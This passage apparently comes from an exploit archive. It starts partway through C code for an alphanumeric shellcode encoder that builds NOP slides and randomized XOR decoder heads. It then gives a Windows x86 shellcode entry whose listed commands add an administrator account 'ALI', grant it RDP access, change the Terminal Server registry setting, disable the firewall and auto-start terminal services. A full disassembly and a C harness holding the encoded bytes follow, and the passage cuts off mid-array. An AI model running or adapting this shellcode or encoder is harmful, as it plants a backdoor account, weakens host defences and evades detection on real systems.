str+substr_offset+substr_len, suffix_substr_len); free(prefix_substr); free(suffix_substr); free(substr); return output_str; } UCHAR *slide_substr_forward(UCHAR *str, UINT substr_offset, UINT substr_len, UINT str_len, UINT slide) { UCHAR *prefix_substr, *substr, *suffix_substr, *output_str; UINT prefix_substr_len, suffix_substr_len; if(slide > str_len-substr_len-substr_offset) { printf("you can't slide it that far forward!\n"); return 0; } output_str = malloc(str_len); memset(output_str, 0 , str_len); suffix_substr_len = str_len-substr_len-substr_offset; suffix_substr = malloc(suffix_substr_len); memset(suffix_substr, 0, suffix_substr_len); prefix_substr_len = substr_offset; prefix_substr = malloc(prefix_substr_len); memset(prefix_substr, 0, prefix_substr_len); substr = malloc(substr_len); memset(substr, 0, substr_len); strncpy(substr, str+substr_offset, substr_len); strncpy(prefix_substr, str, prefix_substr_len); strncpy(suffix_substr, str+substr_offset+substr_len, suffix_substr_len); strncpy(output_str, prefix_substr, prefix_substr_len); strncpy(output_str+prefix_substr_len, suffix_substr, slide); strncpy(output_str+prefix_substr_len+slide, substr, substr_len); strncpy(output_str+prefix_substr_len+slide+substr_len, suffix_substr+slide, suffix_substr_len-slide); free(prefix_substr); free(suffix_substr); free(substr); return output_str; } UCHAR *get_nop_slide(UINT size, UINT slide) { //simple alnum nop slide generator UINT i, x, append_dec_eax = 0; UCHAR alnum_nop[][3] = { "AI", //inc ecx;dec ecx // (alnum_nop[0]) "BJ", //inc edx;dec edx // (alnum_nop[1]) "CK", //inc ebx;dec ebx // (alnum_nop[2]) "EM", //inc ebp;dec ebp // (alnum_nop[3]) "FN", //inc esi;dec esi // (alnum_nop[4]) "GO", //inc edi;dec edi // (alnum_nop[5]) [we don't care about eax value before the imul] "HG", //dec eax;inc edi // (alnum_nop[6]) --- not allowed in nop_slide_2 [instruction as it overwrites eax with result ] "HO", //dec eax;dec edi // (alnum_nop[7]) --- not allowed in nop_slide_2 [and we don't care about edi value at all. ] "DL", //inc esp;dec esp // (alnum_nop[8]) --- [todo: need to preserve stack state] >--. //we can freely inc/dec esp for now // "PX", //push eax;pop eax// (alnum_nop[9]) --- [todo: need to preserve stack state] >--| //but we need to take it into account // "QY", //push ecx;pop ecx// (alnum_nop[10]) ---[todo: need to preserve stack state] >--| //once we start pushing/poping to/from // "RZ", //push edx;pop edx// (alnum_nop[11]) ---[todo: need to preserve stack state] >--' //the stack. // | //TODO: <-----------------------------------------------------------------------------------' // push eax push eax push eax push ecx push edx // pop eax push ecx push ecx dec esp pop edx // push ecx pop ecx push edx inc esp push ecx // pop ecx pop eax inc esp pop ecx pop ecx // push edx push edx dec esp push eax push eax // pop edx pop edx pop edx inc esp pop eax // pop ecx dec esp . // pop eax pop eax . // push edx . // pop edx etc... }; UCHAR *nop_slide; nop_slide = malloc(size); memset(nop_slide, 0, size); if(size%2) { append_dec_eax = 1; size--; } for(i=0; i<(size/2); i++) { do x = rand()%(sizeof(alnum_nop)/3); while ((slide==2)&&(x==6||x==7)); strcat(nop_slide, alnum_nop[x]); } if(append_dec_eax) { strcat(nop_slide, slide==1?"H":rand()%2?"G":"O"); //dec eax or inc/dec edi - depends on which nop slide } return nop_slide; } UCHAR get_random_alnum_push_dword_opcode() { UCHAR alnum_push_dword_opcode[] = { 'P', //0x50 push eax 'Q', //0x51 push ecx 'R', //0x52 push edx 'S', //0x53 push ebx 'T', //0x54 push esp 'U', //0x55 push ebp 'V', //0x56 push esi 'W' //0x57 push edi }; return alnum_push_dword_opcode[rand()%sizeof(alnum_push_dword_opcode)]; } UCHAR get_random_alnum_value() { char alnum_values[] = ALNUM_CHARSET; return alnum_values[rand()%strlen(alnum_values)]; } UCHAR get_push_register_instruction(UCHAR *reg) { if (!strcmp(reg, "eax")) return 'P'; //0x50 push eax else if (!strcmp(reg, "ecx")) return 'Q'; //0x51 push ecx else if (!strcmp(reg, "edx")) return 'R'; //0x52 push edx else if (!strcmp(reg, "ebx")) return 'S'; //0x53 push ebx else if (!strcmp(reg, "esp")) return 'T'; //0x54 push esp else if (!strcmp(reg, "ebp")) return 'U'; //0x55 push ebp else if (!strcmp(reg, "esi")) return 'V'; //0x56 push esi else if (!strcmp(reg, "edi")) return 'W'; //0x57 push edi else return 0; } UCHAR *randomize_decoder_head(UCHAR *decoder, UINT size_decoder, UCHAR xor_al1, UCHAR jne_xor1) { UCHAR states[11] = {0,1,2,3,4,5,6,7,8,9,10}; UCHAR instructions[11][3]; UCHAR instruction_comments[11][28]; UINT i,c, state; UCHAR *output; UCHAR *random_states; UCHAR *p_state[5]; output = malloc(17); memset(output, 0, 17); memset(instructions, 0, 11*3); memset(instruction_comments, 0, 11*28); instructions[0][0] = '\x6a'; //j instructions[0][1] = xor_al1; // instructions[1][0] = '\x58'; //X instructions[2][0] = '\x34'; //4 instructions[2][1] = xor_al1; // instructions[3][0] = '\x48'; //H instructions[4][0] = '\x34'; //4 instructions[4][1] = jne_xor1; // instructions[5][0] = '\x30'; //0 instructions[5][1] = '\x42'; //B instructions[5][2] = size_decoder-1; // instructions[6][0] = '\x52'; //R instructions[7][0] = '\x52'; //R instructions[8][0] = '\x59'; //Y instructions[9][0] = '\x47'; //G instructions[10][0] = '\x43'; //C strcat(instruction_comments[0], "push XOR_AL1"); strcat(instruction_comments[1], "pop eax"); strcat(instruction_comments[2], "xor al, XOR_AL1"); strcat(instruction_comments[3], "dec eax"); strcat(instruction_comments[4], "xor al, JNE_XOR1"); strcat(instruction_comments[5], "xor byte ptr [edx+size], al"); strcat(instruction_comments[6], "push edx"); strcat(instruction_comments[7], "push edx"); strcat(instruction_comments[8], "pop ecx"); strcat(instruction_comments[9], "inc edi"); strcat(instruction_comments[10], "inc ebx"); do { memset(p_state, 0, sizeof(UCHAR*)*5); random_states = shuffle(states, 11); //.*0.*1.*2.*3.*4.*5 p_state[0] = memchr(random_states, 0, 11); if(p_state[0]) p_state[1] = memchr(p_state[0], 1, 11-(p_state[0]-random_states)); if(p_state[1]) p_state[1] = memchr(p_state[1], 2, 11-(p_state[1]-random_states)); if(p_state[1]) p_state[1] = memchr(p_state[1], 3, 11-(p_state[1]-random_states)); if(p_state[1]) p_state[1] = memchr(p_state[1], 4, 11-(p_state[1]-random_states)); if(p_state[1]) p_state[1] = memchr(p_state[1], 5, 11-(p_state[1]-random_states)); //.*[67].*8 if(p_state[1]) { p_state[2] = memchr(random_states, 6, 11); p_state[3] = memchr(p_state[2], 8, 11-(p_state[2]-random_states)); if(!p_state[3]) { p_state[2] = memchr(random_states, 7, 11); p_state[3] = memchr(p_state[2], 8, 11-(p_state[2]-random_states)); } if(p_state[3]) { //.*1.*[67].*[67] if(p_state[2] && p_state[1] < p_state[2]) p_state[4] = memchr(p_state[2], *p_state[2]==6?7:6, 11-(p_state[2]-random_states)); //.*0.*[67].*8.*1 if(!p_state[4]) p_state[4] = memchr(p_state[0], 6, 11-(p_state[0]-random_states)); if(!p_state[4]) p_state[4] = memchr(p_state[0], 7, 11-(p_state[0]-random_states)); if(p_state[4]) p_state[4] = memchr(p_state[4], 8, 11-(p_state[4]-random_states)); if(p_state[4]) p_state[4] = memchr(p_state[4], 1, 11-(p_state[4]-random_states)); //.*[67].*8.*0.*1.*[67] if(!p_state[4]) p_state[4] = memchr(p_state[3], 0, 11-(p_state[3]-random_states)); if(p_state[4]) p_state[4] = memchr(p_state[4], 1, 11-(p_state[3]-random_states)); if(p_state[4]) p_state[4] = memchr(p_state[4], *p_state[3]==6?7:6, 11-(p_state[4]-random_states)); } } } while (!p_state[4]); for (c=state=0; state<sizeof(states); state++) { i=0; while (instructions[random_states[state]][i] && i < 3) { output[c] = instructions[random_states[state]][i]; i++; c++; } } printf("======================\ndecoder head instruction order: %x %x %x %x %x %x %x %x %x %x %x\n", random_states[0], random_states[1], random_states[2], random_states[3], random_states[4], random_states[5], random_states[6], random_states[7], random_states[8], random_states[9], random_states[10] ); printf("%s\n" \ "%s\n" \ "%s\n" \ "%s\n" \ "%s\n" \ "%s\n" \ "%s\n" \ "%s\n" \ "%s\n" \ "%s\n" \ "%s\n======================\n", instruction_comments[random_states[0]], instruction_comments[random_states[1]], instruction_comments[random_states[2]], instruction_comments[random_states[3]], instruction_comments[random_states[4]], instruction_comments[random_states[5]], instruction_comments[random_states[6]], instruction_comments[random_states[7]], instruction_comments[random_states[8]], instruction_comments[random_states[9]], instruction_comments[random_states[10]]); return output; }
  13. #Author: Ali Razmjoo #Title: Obfuscated Shellcode Windows x86 [1218 Bytes] [Add Administrator User/Pass ALI/ALI & Add ALI to RDP Group & Enable RDP From Registery & STOP Firewall & Auto Start terminal service] Obfuscated Shellcode Windows x86 [1218 Bytes].c /* #Title: Obfuscated Shellcode Windows x86 [1218 Bytes] [Add Administrator User/Pass ALI/ALI & Add ALI to RDP Group & Enable RDP From Registery & STOP Firewall & Auto Start terminal service] #length: 1218 bytes #Date: 13 January 2015 #Author: Ali Razmjoo #tested On: Windows 7 x86 ultimate WinExec => 0x7666e695 ExitProcess => 0x76632acf ==================================== Execute : net user ALI ALI /add net localgroup Administrators ALI /add NET LOCALGROUP "Remote Desktop Users" ALI /add reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 1 /f netsh firewall set opmode disable sc config termservice start= auto ==================================== Ali Razmjoo , ['Ali.Razmjoo1994@Gmail.Com','Ali@Z3r0D4y.Com'] Thanks to my friends , Dariush Nasirpour and Ehsan Nezami C:\Users\Ali\Desktop>objdump -D shellcode.o shellcode.o: file format elf32-i386 Disassembly of section .text: 00000000 <.text>: 0: 31 c0 xor %eax,%eax 2: 50 push %eax 3: b8 41 41 41 64 mov $0x64414141,%eax 8: c1 e8 08 shr $0x8,%eax b: c1 e8 08 shr $0x8,%eax e: c1 e8 08 shr $0x8,%eax 11: 50 push %eax 12: b9 6d 76 53 52 mov $0x5253766d,%ecx 17: ba 4d 59 32 36 mov $0x3632594d,%edx 1c: 31 d1 xor %edx,%ecx 1e: 51 push %ecx 1f: b9 6e 72 61 71 mov $0x7161726e,%ecx 24: ba 4e 33 2d 38 mov $0x382d334e,%edx 29: 31 d1 xor %edx,%ecx 2b: 51 push %ecx 2c: b9 6c 75 78 78 mov $0x7878756c,%ecx 31: ba 4c 34 34 31 mov $0x3134344c,%edx 36: 31 d1 xor %edx,%ecx 38: 51 push %ecx 39: b9 46 47 57 46 mov $0x46574746,%ecx 3e: ba 33 34 32 34 mov $0x34323433,%edx 43: 31 d1 xor %edx,%ecx 45: 51 push %ecx 46: b9 56 50 47 64 mov $0x64475056,%ecx 4b: ba 38 35 33 44 mov $0x44333538,%edx 50: 31 d1 xor %edx,%ecx 52: 51 push %ecx 53: 89 e0 mov %esp,%eax 55: bb 41 41 41 01 mov $0x1414141,%ebx 5a: c1 eb 08 shr $0x8,%ebx 5d: c1 eb 08 shr $0x8,%ebx 60: c1 eb 08 shr $0x8,%ebx 63: 53 push %ebx 64: 50 push %eax 65: bb a6 b4 02 2f mov $0x2f02b4a6,%ebx 6a: ba 33 52 64 59 mov $0x59645233,%edx 6f: 31 d3 xor %edx,%ebx 71: ff d3 call *%ebx 73: 31 c0 xor %eax,%eax 75: 50 push %eax 76: 68 41 41 64 64 push $0x64644141 7b: 58 pop %eax 7c: c1 e8 08 shr $0x8,%eax 7f: c1 e8 08 shr $0x8,%eax 82: 50 push %eax 83: b9 01 41 60 32 mov $0x32604101,%ecx 88: ba 48 61 4f 53 mov $0x534f6148,%edx 8d: 31 d1 xor %edx,%ecx 8f: 51 push %ecx 90: b9 28 47 0d 2f mov $0x2f0d4728,%ecx 95: ba 5b 67 4c 63 mov $0x634c675b,%edx 9a: 31 d1 xor %edx,%ecx 9c: 51 push %ecx 9d: b9 03 24 36 21 mov $0x21362403,%ecx a2: ba 62 50 59 53 mov $0x53595062,%edx a7: 31 d1 xor %edx,%ecx a9: 51 push %ecx aa: b9 34 41 15 18 mov $0x18154134,%ecx af: ba 5d 32 61 6a mov $0x6a61325d,%edx b4: 31 d1 xor %edx,%ecx b6: 51 push %ecx b7: b9 0c 05 1b 25 mov $0x251b050c,%ecx bc: ba 68 68 72 4b mov $0x4b726868,%edx c1: 31 d1 xor %edx,%ecx c3: 51 push %ecx c4: b9 2f 27 7b 13 mov $0x137b272f,%ecx c9: ba 5a 57 5b 52 mov $0x525b575a,%edx ce: 31 d1 xor %edx,%ecx d0: 51 push %ecx d1: b9 1c 2c 02 3e mov $0x3e022c1c,%ecx d6: ba 70 4b 70 51 mov $0x51704b70,%edx db: 31 d1 xor %edx,%ecx dd: 51 push %ecx de: b9 3d 2a 32 4c mov $0x4c322a3d,%ecx e3: ba 51 45 51 2d mov $0x2d514551,%edx e8: 31 d1 xor %edx,%ecx ea: 51 push %ecx eb: b9 23 5c 1c 19 mov $0x191c5c23,%ecx f0: ba 4d 39 68 39 mov $0x3968394d,%edx f5: 31 d1 xor %edx,%ecx f7: 51 push %ecx f8: 89 e0 mov %esp,%eax fa: bb 41 41 41 01 mov $0x1414141,%ebx ff: c1 eb 08 shr $0x8,%ebx 102: c1 eb 08 shr $0x8,%ebx 105: c1 eb 08 shr $0x8,%ebx 108: 53 push %ebx 109: 50 push %eax 10a: bb a6 b4 02 2f mov $0x2f02b4a6,%ebx 10f: ba 33 52 64 59 mov $0x59645233,%edx 114: 31 d3 xor %edx,%ebx 116: ff d3 call *%ebx 118: 31 c0 xor %eax,%eax 11a: 50 push %eax 11b: 68 41 41 64 64 push $0x64644141 120: 58 pop %eax 121: c1 e8 08 shr $0x8,%eax 124: c1 e8 08 shr $0x8,%eax 127: 50 push %eax 128: b9 02 63 6b 35 mov $0x356b6302,%ecx 12d: ba 4b 43 44 54 mov $0x5444434b,%edx 132: 31 d1 xor %edx,%ecx 134: 51 push %ecx 135: b9 61 55 6c 3d mov $0x3d6c5561,%ecx 13a: ba 43 75 2d 71 mov $0x712d7543,%edx 13f: 31 d1 xor %edx,%ecx 141: 51 push %ecx 142: b9 27 3f 3b 1a mov $0x1a3b3f27,%ecx 147: ba 54 5a 49 69 mov $0x69495a54,%edx 14c: 31 d1 xor %edx,%ecx 14e: 51 push %ecx 14f: b9 25 34 12 67 mov $0x67123425,%ecx 154: ba 4a 44 32 32 mov $0x3232444a,%edx 159: 31 d1 xor %edx,%ecx 15b: 51 push %ecx 15c: b9 0b 02 1f 19 mov $0x191f020b,%ecx 161: ba 6e 71 74 6d mov $0x6d74716e,%edx 166: 31 d1 xor %edx,%ecx 168: 51 push %ecx 169: b9 39 3f 7b 15 mov $0x157b3f39,%ecx 16e: ba 4d 5a 5b 51 mov $0x515b5a4d,%edx 173: 31 d1 xor %edx,%ecx 175: 51 push %ecx 176: b9 35 15 03 2a mov $0x2a031535,%ecx 17b: ba 67 70 6e 45 mov $0x456e7067,%edx 180: 31 d1 xor %edx,%ecx 182: 51 push %ecx 183: b9 3a 17 75 46 mov $0x4675173a,%ecx 188: ba 6f 47 55 64 mov $0x6455476f,%edx 18d: 31 d1 xor %edx,%ecx 18f: 51 push %ecx 190: b9 26 35 0b 1e mov $0x1e0b3526,%ecx 195: ba 6a 72 59 51 mov $0x5159726a,%edx 19a: 31 d1 xor %edx,%ecx 19c: 51 push %ecx 19d: b9 2a 2a 06 2a mov $0x2a062a2a,%ecx 1a2: ba 66 65 45 6b mov $0x6b456566,%edx 1a7: 31 d1 xor %edx,%ecx 1a9: 51 push %ecx 1aa: b9 1d 20 35 5a mov $0x5a35201d,%ecx 1af: ba 53 65 61 7a mov $0x7a616553,%edx 1b4: 31 d1 xor %edx,%ecx 1b6: 51 push %ecx 1b7: 89 e0 mov %esp,%eax 1b9: bb 41 41 41 01 mov $0x1414141,%ebx 1be: c1 eb 08 shr $0x8,%ebx 1c1: c1 eb 08 shr $0x8,%ebx 1c4: c1 eb 08 shr $0x8,%ebx 1c7: 53 push %ebx 1c8: 50 push %eax 1c9: bb a6 b4 02 2f mov $0x2f02b4a6,%ebx 1ce: ba 33 52 64 59 mov $0x59645233,%edx 1d3: 31 d3 xor %edx,%ebx 1d5: ff d3 call *%ebx 1d7: 31 c0 xor %eax,%eax 1d9: 50 push %eax 1da: b9 09 4c 7c 5e mov $0x5e7c4c09,%ecx 1df: ba 38 6c 53 38 mov $0x38536c38,%edx 1e4: 31 d1 xor %edx,%ecx 1e6: 51 push %ecx 1e7: b9 42 4d 39 14 mov $0x14394d42,%ecx 1ec: ba 62 62 5d 34 mov $0x345d6262,%edx 1f1: 31 d1 xor %edx,%ecx 1f3: 51 push %ecx 1f4: b9 7a 24 26 75 mov $0x7526247a,%ecx 1f9: ba 2d 6b 74 31 mov $0x31746b2d,%edx 1fe: 31 d1 xor %edx,%ecx 200: 51 push %ecx 201: b9 1d 30 15 28 mov $0x2815301d,%ecx 206: ba 58 77 4a 6c mov $0x6c4a7758,%edx 20b: 31 d1 xor %edx,%ecx 20d: 51 push %ecx 20e: b9 7c 2f 57 16 mov $0x16572f7c,%ecx 213: ba 53 5b 77 44 mov $0x44775b53,%edx 218: 31 d1 xor %edx,%ecx 21a: 51 push %ecx 21b: b9 42 25 2a 66 mov $0x662a2542,%ecx 220: ba 2d 4b 59 46 mov $0x46594b2d,%edx 225: 31 d1 xor %edx,%ecx 227: 51 push %ecx 228: b9 28 2f 0c 5a mov $0x5a0c2f28,%ecx 22d: ba 4d 4c 78 33 mov $0x33784c4d,%edx 232: 31 d1 xor %edx,%ecx 234: 51 push %ecx 235: b9 20 2b 26 26 mov $0x26262b20,%ecx 23a: ba 63 44 48 48 mov $0x48484463,%edx 23f: 31 d1 xor %edx,%ecx 241: 51 push %ecx 242: b9 08 2b 23 67 mov $0x67232b08,%ecx 247: ba 66 52 77 34 mov $0x34775266,%edx 24c: 31 d1 xor %edx,%ecx 24e: 51 push %ecx 24f: b9 49 1c 2e 48 mov $0x482e1c49,%ecx 254: ba 69 7a 6a 2d mov $0x2d6a7a69,%edx 259: 31 d1 xor %edx,%ecx 25b: 51 push %ecx 25c: b9 67 67 1d 37 mov $0x371d6767,%ecx 261: ba 45 47 32 41 mov $0x41324745,%edx 266: 31 d1 xor %edx,%ecx 268: 51 push %ecx 269: b9 03 33 0d 3b mov $0x3b0d3303,%ecx 26e: ba 71 45 68 49 mov $0x49684571,%edx 273: 31 d1 xor %edx,%ecx 275: 51 push %ecx 276: b9 39 6a 3c 2f mov $0x2f3c6a39,%ecx 27b: ba 55 4a 6f 4a mov $0x4a6f4a55,%edx 280: 31 d1 xor %edx,%ecx 282: 51 push %ecx 283: b9 37 44 1f 2e mov $0x2e1f4437,%ecx 288: ba 5a 2d 71 4f mov $0x4f712d5a,%edx 28d: 31 d1 xor %edx,%ecx 28f: 51 push %ecx 290: b9 34 23 23 3b mov $0x3b232334,%ecx 295: ba 68 77 46 49 mov $0x49467768,%edx 29a: 31 d1 xor %edx,%ecx 29c: 51 push %ecx 29d: b9 07 3a 0a 14 mov $0x140a3a07,%ecx 2a2: ba 73 48 65 78 mov $0x78654873,%edx 2a7: 31 d1 xor %edx,%ecx 2a9: 51 push %ecx 2aa: b9 14 2e 58 53 mov $0x53582e14,%ecx 2af: ba 48 6d 37 3d mov $0x3d376d48,%edx 2b4: 31 d1 xor %edx,%ecx 2b6: 51 push %ecx 2b7: b9 3e 3d 26 32 mov $0x32263d3e,%ecx 2bc: ba 52 6e 43 46 mov $0x46436e52,%edx 2c1: 31 d1 xor %edx,%ecx 2c3: 51 push %ecx 2c4: b9 33 3c 35 34 mov $0x34353c33,%ecx 2c9: ba 5d 48 47 5b mov $0x5b47485d,%edx 2ce: 31 d1 xor %edx,%ecx 2d0: 51 push %ecx 2d1: b9 36 0e 07 2b mov $0x2b070e36,%ecx 2d6: ba 58 7a 44 44 mov $0x44447a58,%edx 2db: 31 d1 xor %edx,%ecx 2dd: 51 push %ecx 2de: b9 3c 10 0a 37 mov $0x370a103c,%ecx 2e3: ba 49 62 78 52 mov $0x52786249,%edx 2e8: 31 d1 xor %edx,%ecx 2ea: 51 push %ecx 2eb: b9 24 7c 3b 36 mov $0x363b7c24,%ecx 2f0: ba 61 31 67 75 mov $0x75673161,%edx 2f5: 31 d1 xor %edx,%ecx 2f7: 51 push %ecx 2f8: b9 31 3d 3b 27 mov $0x273b3d31,%ecx 2fd: ba 62 64 68 73 mov $0x73686462,%edx 302: 31 d1 xor %edx,%ecx 304: 51 push %ecx 305: b9 7f 7d 3d 35 mov $0x353d7d7f,%ecx 30a: ba 36 33 78 69 mov $0x69783336,%edx 30f: 31 d1 xor %edx,%ecx 311: 51 push %ecx 312: b9 7c 13 0f 2f mov $0x2f0f137c,%ecx 317: ba 31 52 4c 67 mov $0x674c5231,%edx 31c: 31 d1 xor %edx,%ecx 31e: 51 push %ecx 31f: b9 1b 08 35 2d mov $0x2d35081b,%ecx 324: ba 58 49 79 72 mov $0x72794958,%edx 329: 31 d1 xor %edx,%ecx 32b: 51 push %ecx 32c: b9 74 3a 1e 21 mov $0x211e3a74,%ecx 331: ba 2d 65 52 6e mov $0x6e52652d,%edx 336: 31 d1 xor %edx,%ecx 338: 51 push %ecx 339: b9 16 10 1f 17 mov $0x171f1016,%ecx 33e: ba 34 58 54 52 mov $0x52545834,%edx 343: 31 d1 xor %edx,%ecx 345: 51 push %ecx 346: b9 2f 27 0c 6e mov $0x6e0c272f,%ecx 34b: ba 4e 43 68 4e mov $0x4e68434e,%edx 350: 31 d1 xor %edx,%ecx 352: 51 push %ecx 353: b9 39 22 5e 50 mov $0x505e2239,%ecx 358: ba 4b 47 39 70 mov $0x7039474b,%edx 35d: 31 d1 xor %edx,%ecx 35f: 51 push %ecx 360: 89 e0 mov %esp,%eax 362: bb 41 41 41 01 mov $0x1414141,%ebx 367: c1 eb 08 shr $0x8,%ebx 36a: c1 eb 08 shr $0x8,%ebx 36d: c1 eb 08 shr $0x8,%ebx 370: 53 push %ebx 371: 50 push %eax 372: bb a6 b4 02 2f mov $0x2f02b4a6,%ebx 377: ba 33 52 64 59 mov $0x59645233,%edx 37c: 31 d3 xor %edx,%ebx 37e: ff d3 call *%ebx 380: 31 c0 xor %eax,%eax 382: 50 push %eax 383: b8 41 41 41 65 mov $0x65414141,%eax 388: c1 e8 08 shr $0x8,%eax 38b: c1 e8 08 shr $0x8,%eax 38e: c1 e8 08 shr $0x8,%eax 391: 50 push %eax 392: b9 1e 53 39 3c mov $0x3c39531e,%ecx 397: ba 6d 32 5b 50 mov $0x505b326d,%edx 39c: 31 d1 xor %edx,%ecx 39e: 51 push %ecx 39f: b9 04 66 2f 32 mov $0x322f6604,%ecx 3a4: ba 61 46 4b 5b mov $0x5b4b4661,%edx 3a9: 31 d1 xor %edx,%ecx 3ab: 51 push %ecx 3ac: b9 19 1e 0d 11 mov $0x110d1e19,%ecx 3b1: ba 69 73 62 75 mov $0x75627369,%edx 3b6: 31 d1 xor %edx,%ecx 3b8: 51 push %ecx 3b9: b9 20 41 47 36 mov $0x36474120,%ecx 3be: ba 45 35 67 59 mov $0x59673545,%edx 3c3: 31 d1 xor %edx,%ecx 3c5: 51 push %ecx 3c6: b9 2b 05 64 2a mov $0x2a64052b,%ecx 3cb: ba 47 69 44 59 mov $0x59446947,%edx 3d0: 31 d1 xor %edx,%ecx 3d2: 51 push %ecx 3d3: b9 10 3f 4f 22 mov $0x224f3f10,%ecx 3d8: ba 62 5a 38 43 mov $0x43385a62,%edx 3dd: 31 d1 xor %edx,%ecx 3df: 51 push %ecx 3e0: b9 2a 6f 2a 24 mov $0x242a6f2a,%ecx 3e5: ba 42 4f 4c 4d mov $0x4d4c4f42,%edx 3ea: 31 d1 xor %edx,%ecx 3ec: 51 push %ecx 3ed: b9 29 09 1e 5e mov $0x5e1e0929,%ecx 3f2: ba 47 6c 6a 2d mov $0x2d6a6c47,%edx 3f7: 31 d1 xor %edx,%ecx 3f9: 51 push %ecx 3fa: 89 e0 mov %esp,%eax 3fc: bb 41 41 41 01 mov $0x1414141,%ebx 401: c1 eb 08 shr $0x8,%ebx 404: c1 eb 08 shr $0x8,%ebx 407: c1 eb 08 shr $0x8,%ebx 40a: 53 push %ebx 40b: 50 push %eax 40c: bb a6 b4 02 2f mov $0x2f02b4a6,%ebx 411: ba 33 52 64 59 mov $0x59645233,%edx 416: 31 d3 xor %edx,%ebx 418: ff d3 call *%ebx 41a: 31 c0 xor %eax,%eax 41c: 50 push %eax 41d: b8 41 41 41 6f mov $0x6f414141,%eax 422: c1 e8 08 shr $0x8,%eax 425: c1 e8 08 shr $0x8,%eax 428: c1 e8 08 shr $0x8,%eax 42b: 50 push %eax 42c: b9 72 2a 05 39 mov $0x39052a72,%ecx 431: ba 52 4b 70 4d mov $0x4d704b52,%edx 436: 31 d1 xor %edx,%ecx 438: 51 push %ecx 439: b9 54 3a 05 52 mov $0x52053a54,%ecx 43e: ba 35 48 71 6f mov $0x6f714835,%edx 443: 31 d1 xor %edx,%ecx 445: 51 push %ecx 446: b9 29 16 0a 47 mov $0x470a1629,%ecx 44b: ba 4c 36 79 33 mov $0x3379364c,%edx 450: 31 d1 xor %edx,%ecx 452: 51 push %ecx 453: b9 27 1b 5b 3e mov $0x3e5b1b27,%ecx 458: ba 55 6d 32 5d mov $0x5d326d55,%edx 45d: 31 d1 xor %edx,%ecx 45f: 51 push %ecx 460: b9 33 1a 3b 10 mov $0x103b1a33,%ecx 465: ba 41 77 48 75 mov $0x75487741,%edx 46a: 31 d1 xor %edx,%ecx 46c: 51 push %ecx 46d: b9 34 79 3a 12 mov $0x123a7934,%ecx 472: ba 53 59 4e 77 mov $0x774e5953,%edx 477: 31 d1 xor %edx,%ecx 479: 51 push %ecx 47a: b9 1d 5c 1e 28 mov $0x281e5c1d,%ecx 47f: ba 72 32 78 41 mov $0x41783272,%edx 484: 31 d1 xor %edx,%ecx 486: 51 push %ecx 487: b9 2a 4e 5a 28 mov $0x285a4e2a,%ecx 48c: ba 59 2d 7a 4b mov $0x4b7a2d59,%edx 491: 31 d1 xor %edx,%ecx 493: 51 push %ecx 494: 89 e0 mov %esp,%eax 496: bb 41 41 41 01 mov $0x1414141,%ebx 49b: c1 eb 08 shr $0x8,%ebx 49e: c1 eb 08 shr $0x8,%ebx 4a1: c1 eb 08 shr $0x8,%ebx 4a4: 53 push %ebx 4a5: 50 push %eax 4a6: bb a6 b4 02 2f mov $0x2f02b4a6,%ebx 4ab: ba 33 52 64 59 mov $0x59645233,%edx 4b0: 31 d3 xor %edx,%ebx 4b2: ff d3 call *%ebx 4b4: bb f9 7e 5e 22 mov $0x225e7ef9,%ebx 4b9: ba 36 54 3d 54 mov $0x543d5436,%edx 4be: 31 d3 xor %edx,%ebx 4c0: ff d3 call *%ebx */ #include <stdio.h> #include <string.h> int main(){ unsigned char shellcode[]= "\x31\xc0\x50\xb8\x41\x41\x41\x64\xc1\xe8\x08\xc1\xe8\x08\xc1\xe8\x08\x50\xb9\x6d\x76\x53\x52\xba\x4d\x59\x32\x36\x31\xd1\x51\xb9\x6e\x72\x61\x71\xba\x4e\x33\x2d\x38\x31\xd1\x51\xb9\x6c\x75\x78\x78\xba\x4c\x34\x34\x31\x31\xd1\x51\xb9\x46\x47\x57\x46\xba\x33\x34\x32\x34\x31\xd1\x51\xb9\x56\x50\x47\x64\xba\x38\x35\x33\x44\x31\xd1\x51\x89\xe0\xbb\x41\x41\x41\x01\xc1\xeb\x08\xc1\xeb\x08\xc1\xeb\x08\x53\x50\xbb\xa6\xb4\x02\x2f\xba\x33\x52\x64\x59\x31\xd3\xff\xd3\x31\xc0\x50\x68\x41\x41\x64\x64\x58\xc1\xe8\x08\xc1\xe8\x08\x50\xb9\x01\x41\x60\x32\xba\x48\x61\x4f\x53\x31\xd1\x51\xb9\x28\x47\x0d\x2f\xba\x5b\x67\x4c\x63\x31\xd1\x51\xb9\x03\x24\x36\x21\xba\x62\x50\x59\x53\x31\xd1\x51\xb9\x34\x41\x15\x18\xba\x5d\x32\x61\x6a\x31\xd1\x51\xb9\x0c\x05\x1b\x25\xba\x68\x68\x72\x4b\x31\xd1\x51\xb9\x2f\x27\x7b\x13\xba\x5a\x57\x5b\x52\x31\xd1\x51\xb9\x1c\x2c\x02\x3e\xba\x70\x4b\x70\x51\x31\xd1\x51\xb9\x3d\x2a\x32\x4c\xba\x51\x45\x51\x2d\x31\xd1\x51\xb9\x23\x5c\x1c\x19\xba\x4d\x39\x68\x39\x31\xd1\x51\x89\xe0\xbb\x41\x41\x41\x01\xc1\xeb\x08\xc1\xeb\x08\xc1\xeb\x08\x53\x50\xbb\xa6\xb4\x02\x2f\xba\x33\x52\x64\x59\x31\xd3\xff\xd3\x31\xc0\x50\x68\x41\x41\x64\x64\x58\xc1\xe8\x08\xc1\xe8\x08\x50\xb9\x02\x63\x6b\x35\xba\x4b\x43\x44\x54\x31\xd1\x51\xb9\x61\x55\x6c\x3d\xba\x43\x75\x2d\x71\x31\xd1\x51\xb9\x27\x3f\x3b\x1a\xba\x54\x5a\x49\x69\x31\xd1\x51\xb9\x25\x34\x12\x67\xba\x4a\x44\x32\x32\x31\xd1\x51\xb9\x0b\x02\x1f\x19\xba\x6e\x71\x74\x6d\x31\xd1\x51\xb9\x39\x3f\x7b\x15\xba\x4d\x5a\x5b\x51\x31\xd1\x51\xb9\x35\x15\x03\x2a\xba\x67\x70\x6e\x45\x31\xd1\x51\xb9\x3a\x17\x75\x46\xba\x6f\x47\x55\x64\x31\xd1\x51\xb9\x26\x35\x0b\x1e\xba\x6a\x72\x59\x51\x31\xd1\x51\xb9\x2a\x2a\x06\x2a\xba\x66\x65\x45\x6b\x31\xd1\x51\xb9\x1d\x20\x35\x5a\xba\x53\x65\x61\x7a\x31\xd1\x51\x89\xe0\xbb\x41\x41\x41\x01\xc1\xeb\x08\xc1\xeb\x08\xc1